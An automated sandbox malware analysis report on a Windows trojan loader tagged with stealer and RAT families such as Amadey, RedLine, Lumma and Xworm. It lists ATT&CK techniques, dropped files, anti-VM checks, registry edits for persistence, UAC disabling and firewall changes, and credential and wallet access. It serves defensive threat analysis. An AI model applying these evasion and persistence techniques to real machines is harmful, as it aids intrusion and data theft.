Malware Analysis Report

2024-09-11 08:43

Sample ID 240429-psgjmsaf58
Target fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814
SHA256 fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814
Tags
amadey evasion trojan lumma redline sectoprat stealc xworm zgrat @cloudytteam cheat test1234 discovery infostealer persistence rat spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814

Threat Level: Known bad

The file fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814 was found to be: Known bad.

Malicious Activity Summary

amadey evasion trojan lumma redline sectoprat stealc xworm zgrat @cloudytteam cheat test1234 discovery infostealer persistence rat spyware stealer themida

Xworm

RedLine

Lumma Stealer

Stealc

Detect ZGRat V1

Detect Xworm Payload

Modifies firewall policy service

SectopRAT payload

UAC bypass

SectopRAT

RedLine payload

Amadey

ZGRat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Blocklisted process makes network request

Drops file in Drivers directory

Reads WinSCP keys stored on the system

Themida packer

Identifies Wine through registry keys

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Checks BIOS information in registry

Reads local data of messenger clients

Registers COM server for autorun

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Drops desktop.ini file(s)

Enumerates connected drives

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Drops Chrome extension

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Modifies system certificate store

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

System policy modification

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Abuse Elevation Control Mechanism
T1548
Bypass User Account Control
T1548.002
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Abuse Elevation Control Mechanism
T1548
Bypass User Account Control
T1548.002
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Credentials in Registry
T1552.002
Discovery
TA0007
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-04-29 12:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-29 12:35

Reported

2024-04-29 12:40

Platform

win7-20240419-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe

"C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe"

Network

N/A

Files

memory/1740-0-0x00000000009B0000-0x0000000000E76000-memory.dmp

memory/1740-1-0x0000000077E30000-0x0000000077E32000-memory.dmp

memory/1740-2-0x00000000009B0000-0x0000000000E76000-memory.dmp

memory/1740-13-0x00000000005F0000-0x00000000005F1000-memory.dmp

memory/1740-12-0x0000000000590000-0x0000000000591000-memory.dmp

memory/1740-11-0x00000000009A0000-0x00000000009A1000-memory.dmp

memory/1740-10-0x0000000000610000-0x0000000000611000-memory.dmp

memory/1740-9-0x00000000005A0000-0x00000000005A1000-memory.dmp

memory/1740-8-0x00000000022C0000-0x00000000022C1000-memory.dmp

memory/1740-7-0x0000000000560000-0x0000000000561000-memory.dmp

memory/1740-6-0x00000000024A0000-0x00000000024A1000-memory.dmp

memory/1740-5-0x0000000000950000-0x0000000000951000-memory.dmp

memory/1740-4-0x0000000002330000-0x0000000002331000-memory.dmp

memory/1740-3-0x00000000022D0000-0x00000000022D1000-memory.dmp

memory/1740-16-0x00000000025C0000-0x00000000025C1000-memory.dmp

memory/1740-15-0x0000000000600000-0x0000000000601000-memory.dmp

memory/1740-17-0x0000000000570000-0x0000000000571000-memory.dmp

memory/1740-18-0x0000000002820000-0x0000000002821000-memory.dmp

memory/1740-22-0x00000000009B0000-0x0000000000E76000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-29 12:35

Reported

2024-04-29 12:40

Platform

win10-20240404-en

Max time kernel

296s

Max time network

306s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe"

Signatures

Amadey

trojan amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A

Xworm

trojan rat xworm

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\DRIVERS\SETFB06.tmp C:\Windows\System32\MsiExec.exe N/A
File created C:\Windows\system32\DRIVERS\SETFB06.tmp C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\VBoxDrv.sys C:\Windows\System32\MsiExec.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A
N/A N/A C:\Users\Admin\Pictures\sAelCBqfqmajhvZlFuHhOhBV.exe N/A
N/A N/A C:\Users\Admin\Pictures\inpZ2sy6FtPiN3iFVSNmtl9m.exe N/A
N/A N/A C:\Users\Admin\Pictures\96RYGPnDVuI0ig9OUcladUHF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe N/A
N/A N/A C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
N/A N/A C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\Pictures\nNWwreBQ6hpuLdr61311PVMb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
N/A N/A C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
N/A N/A C:\Users\Admin\Pictures\qks0AMNyD1SeHMccrttR2V2j.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\"" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ThreadingModel = "Both" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSDS.exe\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxC.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32\ThreadingModel = "Free" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ThreadingModel = "Free" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxC.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\LocalServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxProxyStub.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32 C:\Windows\system32\msiexec.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\qks0AMNyD1SeHMccrttR2V2j.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A api.myip.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\system32\DRVSTORE C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
